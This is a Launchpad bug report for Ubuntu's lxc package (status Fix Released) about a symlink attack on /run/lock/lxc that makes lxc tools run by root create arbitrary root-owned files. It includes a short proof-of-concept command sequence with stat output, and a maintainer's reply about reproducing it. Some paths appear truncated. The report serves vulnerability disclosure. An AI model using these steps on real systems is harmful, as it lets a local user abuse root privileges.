lxc tools lock handling vulnerable to symlink attack
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
lxc (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
During LXC security analysis (see [1]) it was found, that when lxc tools, e.g. lxc-info, are run as user root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink attack before /run/lock/lxc/ exists, which is only possible prior to the administrator creating the first container or automatic startup starting after boot starting one.
PoC:
$ mkdir -p /run/lock/
$ ln -s /test /run/lock/
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
File: ‘/test’
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 52559 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
Birth: -
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://
100 /var/lib/
1.0.3-0ubuntu3 0
500 http://
[1] https:/
CVE References
description: | updated |
description: | updated |
information type: | Private Security → Public Security |
Hi Roman - Thank you for the report!
Unfortunately, I'm having trouble reproducing the issue. You say that guest "somename" has to exist but if a privilege LXC container has been created, /run/lock/lxc always exists. That directory and its subdirectories are only modifiable by root and they're created during the boot process.
I'll now try creating the malicious /run/lock/ lxc/var/ lib/lxc/ somename before creating the "somename" container since /run/lock/lxc will not yet exist.